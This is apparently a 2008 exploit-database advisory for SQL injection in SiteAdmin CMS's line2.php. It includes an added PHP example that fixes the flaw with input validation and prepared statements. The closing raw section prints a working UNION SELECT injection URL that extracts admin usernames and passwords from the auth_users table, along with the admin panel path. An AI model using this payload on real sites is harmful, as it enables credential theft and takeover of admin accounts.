Vendor: SiteAdmin CMS
By: Cr@zy_King / sqL Lov3r'Z Crew Co.
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: SiteAdmin CMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

SiteAdmin CMS Remote SQL Injection Vulnerability

A vulnerability exists in SiteAdmin CMS which allows an attacker to inject SQL via the 'lng' and 'art' parameters of the 'line2.php' script. The published request uses a UNION SELECT to read the 'user_login' and 'user_passw' columns from the 'auth_users' table in the database, which can then be used to gain access to the admin panel.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
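
One way to apply this mitigation to the 'lng' and 'art' parameters, shown as an added example that is not code from SiteAdmin CMS or from the original report. The 'articles' table, its columns, the ALLOWED_LANGS list and the function names are assumptions, and the prepared statement goes one step beyond the input validation the page recommends.

```php
<?php
// Added example, not SiteAdmin CMS code. The articles table, its columns and
// the language list are assumptions; the real schema is not shown on the page.
declare(strict_types=1);

const ALLOWED_LANGS = ['ru', 'en'];

function validate_params(array $query): ?array
{
    // lng: must be a string from a fixed allow-list.
    $lng = $query['lng'] ?? null;
    if (!is_string($lng) || !in_array($lng, ALLOWED_LANGS, true)) {
        return null;
    }
    // art: must be a positive integer and nothing else (arrays also fail).
    $art = filter_var($query['art'] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]);
    if ($art === false) {
        return null;
    }
    return ['lng' => $lng, 'art' => $art];
}

function fetch_article(PDO $db, array $query): ?array
{
    $p = validate_params($query);
    if ($p === null) {
        return null; // caller should answer 400 and log the request
    }
    // Bound parameters keep request values out of the SQL text entirely.
    $stmt = $db->prepare('SELECT id, title FROM articles WHERE id = :art AND lang = :lng');
    $stmt->bindValue(':art', $p['art'], PDO::PARAM_INT);
    $stmt->bindValue(':lng', $p['lng'], PDO::PARAM_STR);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed demo data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE articles (id INTEGER PRIMARY KEY, lang TEXT, title TEXT)');
$db->exec("INSERT INTO articles VALUES (16, 'ru', 'Sample article')");

// A normal request, then a constructed query string in which art carries
// trailing SQL text ('+' decodes to a space); validation rejects the second.
var_dump(fetch_article($db, ['lng' => 'ru', 'art' => '16']));
parse_str('lng=ru&art=16+union+select+1,2', $tampered);
var_dump(fetch_article($db, $tampered));
```

Rejected requests are worth logging with the raw query string, since a non-numeric 'art' value never occurs in normal navigation.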

Exploit-DB raw data:

SiteAdmin CMS Remote Sql Injection Vuln.

Download : http://www.as-admin.com

Cr@zy_King / sqL Lov3r'Z Crew Co.

http://localhost/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,user_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2

Admin Panel : http://localhost/patch/admin/index.php

Thanks : aLL My Friend'Z

                    www.biyosecurity.com

                 ================From Turkey====================

# milw0rm.com [2008-07-27]